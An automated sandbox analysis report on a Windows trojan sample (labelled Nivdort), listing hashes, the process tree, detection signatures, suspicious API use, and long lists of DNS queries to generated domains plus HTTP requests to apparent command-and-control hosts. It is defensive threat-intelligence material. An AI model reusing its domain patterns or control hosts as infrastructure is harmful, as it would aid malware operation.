Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
mtuXDnH1Di.exe

Overview

General Information

Sample name:mtuXDnH1Di.exe
renamed because original name is a hash value
Original sample name:475c13ae1d446c61824315961e5838916ac4a3f28bc441aa8a2b39b81383ea4a.exe
Analysis ID:1488113
MD5:e4b47c06b5eed80fb44cfea757525634
SHA1:78b5133cd84e3d89ebca4b36f33273df6e70c3f4
SHA256:475c13ae1d446c61824315961e5838916ac4a3f28bc441aa8a2b39b81383ea4a
Tags:exe
Infos:

Detection

Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Machine Learning detection for dropped file
Machine Learning detection for sample
Tries to resolve many domain names, but no domain seems valid
Connects to many different domains
Contains functionality to dynamically determine API calls
Contains functionality to enumerate running services
Contains functionality to query network adapater information
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Executes massive DNS lookups (> 100)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found evasive API chain (date check)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • mtuXDnH1Di.exe (PID: 2064 cmdline: "C:\Users\user\Desktop\mtuXDnH1Di.exe" MD5: E4B47C06B5EED80FB44CFEA757525634)
    • qbf30bzbv7f7qnhdav.exe (PID: 5064 cmdline: "C:\whfkpbh\qbf30bzbv7f7qnhdav.exe" MD5: E4B47C06B5EED80FB44CFEA757525634)
      • idtpqzltyfy.exe (PID: 7276 cmdline: "C:\whfkpbh\idtpqzltyfy.exe" MD5: E4B47C06B5EED80FB44CFEA757525634)
  • idtpqzltyfy.exe (PID: 3452 cmdline: C:\whfkpbh\idtpqzltyfy.exe MD5: E4B47C06B5EED80FB44CFEA757525634)
    • amdrhfskpcu.exe (PID: 7240 cmdline: wudcwbel2zfb "c:\whfkpbh\idtpqzltyfy.exe" MD5: E4B47C06B5EED80FB44CFEA757525634)
      • idtpqzltyfy.exe (PID: 7912 cmdline: "c:\whfkpbh\idtpqzltyfy.exe" MD5: E4B47C06B5EED80FB44CFEA757525634)
        • amdrhfskpcu.exe (PID: 7944 cmdline: wudcwbel2zfb "c:\whfkpbh\idtpqzltyfy.exe" MD5: E4B47C06B5EED80FB44CFEA757525634)
  • svchost.exe (PID: 7208 cmdline: C:\Windows\system32\svchost.exe -k LocalService -s W32Time MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 7616 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

Sigma detected: Windows Processes Suspicious Parent Directory
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\system32\svchost.exe -k LocalService -s W32Time, CommandLine: C:\Windows\system32\svchost.exe -k LocalService -s W32Time, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\system32\svchost.exe -k LocalService -s W32Time, ProcessId: 7208, ProcessName: svchost.exe

Snort Signatures

Suricata Signatures

Timestamp:2024-08-05T16:24:59.509195+0200
SID:2018316
Source Port:53
Destination Port:60261
Protocol:UDP
Classtype:A Network Trojan was detected
Timestamp:2024-08-05T16:23:03.262802+0200
SID:2815568
Source Port:49701
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:2024-08-05T16:23:00.468164+0200
SID:2815568
Source Port:49700
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:2024-08-05T16:23:27.903814+0200
SID:2018316
Source Port:53
Destination Port:62372
Protocol:UDP
Classtype:A Network Trojan was detected
Timestamp:2024-08-05T16:24:18.320810+0200
SID:2815568
Source Port:59623
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:2024-08-05T16:23:16.089201+0200
SID:2018316
Source Port:53
Destination Port:65063
Protocol:UDP
Classtype:A Network Trojan was detected
Timestamp:2024-08-05T16:23:07.857815+0200
SID:2037771
Source Port:80
Destination Port:49702
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:2024-08-05T16:23:07.848514+0200
SID:2815568
Source Port:49702
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:2024-08-05T16:23:21.358671+0200
SID:2037771
Source Port:80
Destination Port:49715
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:2024-08-05T16:23:13.975372+0200
SID:2815568
Source Port:49708
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:2024-08-05T16:24:48.786301+0200
SID:2815568
Source Port:59624
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:2024-08-05T16:23:03.286503+0200
SID:2037771
Source Port:80
Destination Port:49701
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:2024-08-05T16:24:48.791817+0200
SID:2037771
Source Port:80
Destination Port:59624
Protocol:TCP
Classtype:A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: mtuXDnH1Di.exeAvira: detected
Antivirus detection for dropped file
Source: C:\whfkpbh\idtpqzltyfy.exeAvira: detection malicious, Label: TR/Nivdort.Gen2
Source: C:\whfkpbh\amdrhfskpcu.exeAvira: detection malicious, Label: TR/Nivdort.Gen2
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exeAvira: detection malicious, Label: TR/Nivdort.Gen2
Multi AV Scanner detection for dropped file
Source: C:\whfkpbh\amdrhfskpcu.exeReversingLabs: Detection: 92%
Source: C:\whfkpbh\idtpqzltyfy.exeReversingLabs: Detection: 92%
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exeReversingLabs: Detection: 92%
Multi AV Scanner detection for submitted file
Source: mtuXDnH1Di.exeReversingLabs: Detection: 92%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\whfkpbh\idtpqzltyfy.exeJoe Sandbox ML: detected
Source: C:\whfkpbh\amdrhfskpcu.exeJoe Sandbox ML: detected
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exeJoe Sandbox ML: detected
Machine Learning detection for sample
Source: mtuXDnH1Di.exeJoe Sandbox ML: detected
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exeCode function: 2_2_009E0920 GetProcAddress,GetProcAddress,GetProcAddress,CryptAcquireContextA,CryptGenRandom,2_2_009E0920
Source: C:\whfkpbh\idtpqzltyfy.exeCode function: 3_2_00150920 GetProcAddress,GetProcAddress,GetProcAddress,CryptAcquireContextA,CryptGenRandom,3_2_00150920
Source: C:\whfkpbh\idtpqzltyfy.exeCode function: 11_2_00150920 GetProcAddress,GetProcAddress,GetProcAddress,CryptAcquireContextA,CryptGenRandom,11_2_00150920
Source: mtuXDnH1Di.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: mtuXDnH1Di.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\mtuXDnH1Di.exeCode function: 0_2_00EE9580 Sleep,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00EE9580
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exeCode function: 2_2_009F9580 Sleep,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,2_2_009F9580
Source: C:\whfkpbh\idtpqzltyfy.exeCode function: 3_2_00169580 Sleep,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,3_2_00169580
Source: C:\whfkpbh\amdrhfskpcu.exeCode function: 5_2_00A59580 Sleep,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,5_2_00A59580
Source: C:\whfkpbh\idtpqzltyfy.exeCode function: 6_2_00169580 Sleep,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,6_2_00169580
Source: C:\whfkpbh\idtpqzltyfy.exeCode function: 11_2_00169580 Sleep,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,11_2_00169580
Source: C:\whfkpbh\amdrhfskpcu.exeCode function: 12_2_00CF9580 Sleep,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,12_2_00CF9580

Networking

barindex
Tries to resolve many domain names, but no domain seems valid
Source: unknownDNS traffic detected: query: smokesystem.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: alreadylaughter.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: followbelieve.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: summerbranch.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gentlemanconsider.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: freshconsider.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: womanreceive.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gentlemanfancy.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: followhonor.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: alreadybranch.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: crowdbelieve.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gentlemanquarter.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: womannorth.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: beginlaughter.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: beginquarter.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: crowdhonor.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: memberlaughter.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: alreadyquarter.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: memberbelieve.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: alreadysystem.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gentlemansystem.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: experiencequarter.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: partyquarter.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: experiencereceive.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: waterbelieve.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: memberfancy.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: crowdquarter.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: smokegeneral.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: freshquarter.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: smokequarter.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: experienceconsider.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: summersystem.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: memberbranch.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: summerquarter.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: summerhonor.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: partysystem.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: alreadyreceive.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: partybranch.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: experiencefriend.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: knownlaughter.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gentlemanneither.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: freshhonor.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: memberconsider.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: fightnorth.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: fightinclude.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: fightgeneral.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: experienceneither.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: waterneither.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: waterbranch.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: alreadytrust.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: freshsystem.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: fighttrust.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: smokebelieve.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: beginbelieve.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: crowdreceive.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: experiencebelieve.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: fightquarter.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: experiencebranch.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: thoughtreceive.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: womanquarter.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: smokenorth.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: freshreceive.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: crowdsystem.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: freshbranch.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: knownbranch.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: smokehonor.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: thoughtquarter.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: crowdneither.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: followsystem.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: knownhonor.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: womantrust.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: beginreceive.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: watertrust.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: smokeneither.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: alreadybelieve.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: freshneither.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: experiencesystem.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: knowntrust.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: alreadyfancy.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: smokereceive.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: knownquarter.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: beginhonor.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: followbranch.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: knownreceive.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: partyinclude.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: followreceive.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: fightreceive.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: summertrust.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: partytrust.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: thoughtbelieve.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: beginneither.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: knownneither.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: fighthonor.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: fightbranch.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: begintrust.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: freshlaughter.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: knownbelieve.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: smokeclear.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: fightneither.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: followlaughter.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: thoughtneither.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: alreadyconsider.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: smoketrust.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: memberneither.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gentlemantrust.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: partynorth.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: womanneither.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: freshfriend.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: womangeneral.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: smokeinclude.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: waterreceive.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gentlemanhonor.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: waterquarter.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: followneither.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: followfancy.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: followtrust.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: memberquarter.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: womaninclude.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: womanbranch.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: followconsider.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: partyclear.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: waterhonor.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gentlemanbelieve.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: experiencetrust.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: summerneither.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: thoughttrust.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: knownsystem.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: womanclear.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: thoughthonor.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: fightclear.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: beginsystem.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: fightbelieve.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: experiencelaughter.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: experiencehonor.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: freshtrust.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: summerreceive.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: experiencefancy.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: partyhonor.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gentlemanbranch.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: memberfriend.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: partyreceive.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gentlemanfriend.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: freshbelieve.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: womansystem.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: followquarter.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: smokebranch.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gentlemanreceive.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: crowdbranch.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: alreadyneither.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: beginbranch.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: memberhonor.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: summerbelieve.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: alreadyhonor.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gentlemanlaughter.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: partyneither.net replaycode: Name error (3)
Source: unknownNetwork traffic detected: DNS query count 171
Source: global trafficDNS traffic detected: number of DNS queries: 171
Source: global trafficHTTP traffic detected: GET /index.php HTTP/1.0Accept: */*Connection: closeHost: partygeneral.net
Source: global trafficHTTP traffic detected: GET /index.php HTTP/1.0Accept: */*Connection: closeHost: memberreceive.net
Source: global trafficHTTP traffic detected: GET /index.php HTTP/1.0Accept: */*Connection: closeHost: thoughtbranch.net
Source: global trafficHTTP traffic detected: GET /index.php HTTP/1.0Accept: */*Connection: closeHost: womanbelieve.net
Source: global trafficHTTP traffic detected: GET /index.php HTTP/1.0Accept: */*Connection: closeHost: partybelieve.net
Source: global trafficHTTP traffic detected: GET /index.php HTTP/1.0Accept: */*Connection: closeHost: membersystem.net
Source: global trafficHTTP traffic detected: GET /index.php HTTP/1.0Accept: */*Connection: closeHost: membertrust.net
Source: global trafficHTTP traffic detected: GET /index.php HTTP/1.0Accept: */*Connection: closeHost: crowdtrust.net
Source: global trafficHTTP traffic detected: GET /index.php HTTP/1.0Accept: */*Connection: closeHost: thoughtsystem.net
Source: global trafficHTTP traffic detected: GET /index.php HTTP/1.0Accept: */*Connection: closeHost: watersystem.net
Source: global trafficHTTP traffic detected: GET /index.php HTTP/1.0Accept: */*Connection: closeHost: womanhonor.net
Source: global trafficHTTP traffic detected: GET /index.php HTTP/1.0Accept: */*Connection: closeHost: freshfancy.net
Source: global trafficHTTP traffic detected: GET /index.php HTTP/1.0Accept: */*Connection: closeHost: alreadyfriend.net
Source: global trafficHTTP traffic detected: GET /index.php HTTP/1.0Accept: */*Connection: closeHost: followfriend.net
Source: global trafficHTTP traffic detected: GET /index.php HTTP/1.0Accept: */*Connection: closeHost: partygeneral.net
Source: global trafficHTTP traffic detected: GET /index.php HTTP/1.0Accept: */*Connection: closeHost: memberreceive.net
Source: Joe Sandbox ViewIP Address: 188.225.40.227 188.225.40.227
Source: Joe Sandbox ViewIP Address: 34.246.200.160 34.246.200.160
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\mtuXDnH1Di.exeCode function: 0_2_00EE0D80 socket,setsockopt,gethostbyname,inet_ntoa,inet_addr,htons,connect,send,recv,recv,closesocket,0_2_00EE0D80
Source: global trafficHTTP traffic detected: GET /index.php HTTP/1.0Accept: */*Connection: closeHost: partygeneral.net
Source: global trafficHTTP traffic detected: GET /index.php HTTP/1.0Accept: */*Connection: closeHost: memberreceive.net
Source: global trafficHTTP traffic detected: GET /index.php HTTP/1.0Accept: */*Connection: closeHost: thoughtbranch.net
Source: global trafficHTTP traffic detected: GET /index.php HTTP/1.0Accept: */*Connection: closeHost: womanbelieve.net
Source: global trafficHTTP traffic detected: GET /index.php HTTP/1.0Accept: */*Connection: closeHost: partybelieve.net
Source: global trafficHTTP traffic detected: GET /index.php HTTP/1.0Accept: */*Connection: closeHost: membersystem.net
Source: global trafficHTTP traffic detected: GET /index.php HTTP/1.0Accept: */*Connection: closeHost: membertrust.net
Source: global trafficHTTP traffic detected: GET /index.php HTTP/1.0Accept: */*Connection: closeHost: crowdtrust.net
Source: global trafficHTTP traffic detected: GET /index.php HTTP/1.0Accept: */*Connection: closeHost: thoughtsystem.net
Source: global trafficHTTP traffic detected: GET /index.php HTTP/1.0Accept: */*Connection: closeHost: watersystem.net
Source: global trafficHTTP traffic detected: GET /index.php HTTP/1.0Accept: */*Connection: closeHost: womanhonor.net
Source: global trafficHTTP traffic detected: GET /index.php HTTP/1.0Accept: */*Connection: closeHost: freshfancy.net
Source: global trafficHTTP traffic detected: GET /index.php HTTP/1.0Accept: */*Connection: closeHost: alreadyfriend.net
Source: global trafficHTTP traffic detected: GET /index.php HTTP/1.0Accept: */*Connection: closeHost: followfriend.net
Source: global trafficHTTP traffic detected: GET /index.php HTTP/1.0Accept: */*Connection: closeHost: partygeneral.net
Source: global trafficHTTP traffic detected: GET /index.php HTTP/1.0Accept: */*Connection: closeHost: memberreceive.net
Source: global trafficDNS traffic detected: DNS query: time.windows.com
Source: global trafficDNS traffic detected: DNS query: womanclear.net
Source: global trafficDNS traffic detected: DNS query: smokeclear.net
Source: global trafficDNS traffic detected: DNS query: womangeneral.net
Source: global trafficDNS traffic detected: DNS query: smokegeneral.net
Source: global trafficDNS traffic detected: DNS query: womaninclude.net
Source: global trafficDNS traffic detected: DNS query: smokeinclude.net
Source: global trafficDNS traffic detected: DNS query: womannorth.net
Source: global trafficDNS traffic detected: DNS query: smokenorth.net
Source: global trafficDNS traffic detected: DNS query: partyclear.net
Source: global trafficDNS traffic detected: DNS query: fightclear.net
Source: global trafficDNS traffic detected: DNS query: partygeneral.net
Source: global trafficDNS traffic detected: DNS query: fightgeneral.net
Source: global trafficDNS traffic detected: DNS query: partyinclude.net
Source: global trafficDNS traffic detected: DNS query: fightinclude.net
Source: global trafficDNS traffic detected: DNS query: partynorth.net
Source: global trafficDNS traffic detected: DNS query: fightnorth.net
Source: global trafficDNS traffic detected: DNS query: freshbranch.net
Source: global trafficDNS traffic detected: DNS query: experiencebranch.net
Source: global trafficDNS traffic detected: DNS query: freshbelieve.net
Source: global trafficDNS traffic detected: DNS query: experiencebelieve.net
Source: global trafficDNS traffic detected: DNS query: freshreceive.net
Source: global trafficDNS traffic detected: DNS query: experiencereceive.net
Source: global trafficDNS traffic detected: DNS query: freshquarter.net
Source: global trafficDNS traffic detected: DNS query: experiencequarter.net
Source: global trafficDNS traffic detected: DNS query: gentlemanbranch.net
Source: global trafficDNS traffic detected: DNS query: alreadybranch.net
Source: global trafficDNS traffic detected: DNS query: gentlemanbelieve.net
Source: global trafficDNS traffic detected: DNS query: alreadybelieve.net
Source: global trafficDNS traffic detected: DNS query: gentlemanreceive.net
Source: global trafficDNS traffic detected: DNS query: alreadyreceive.net
Source: global trafficDNS traffic detected: DNS query: gentlemanquarter.net
Source: global trafficDNS traffic detected: DNS query: alreadyquarter.net
Source: global trafficDNS traffic detected: DNS query: followbranch.net
Source: global trafficDNS traffic detected: DNS query: memberbranch.net
Source: global trafficDNS traffic detected: DNS query: followbelieve.net
Source: global trafficDNS traffic detected: DNS query: memberbelieve.net
Source: global trafficDNS traffic detected: DNS query: followreceive.net
Source: global trafficDNS traffic detected: DNS query: memberreceive.net
Source: global trafficDNS traffic detected: DNS query: followquarter.net
